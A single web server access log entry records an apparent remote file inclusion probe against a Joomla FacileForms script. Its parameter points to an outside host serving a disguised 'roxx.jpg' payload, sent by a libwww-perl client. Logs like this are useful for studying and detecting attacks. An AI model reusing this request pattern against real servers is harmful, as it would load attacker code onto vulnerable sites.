219.94.174.158 - - [04/Nov/2008:12:44:14 -0800] "GET /logs/access_080912.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://rubi4.freehostia.com/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com" 200.93.147.155 -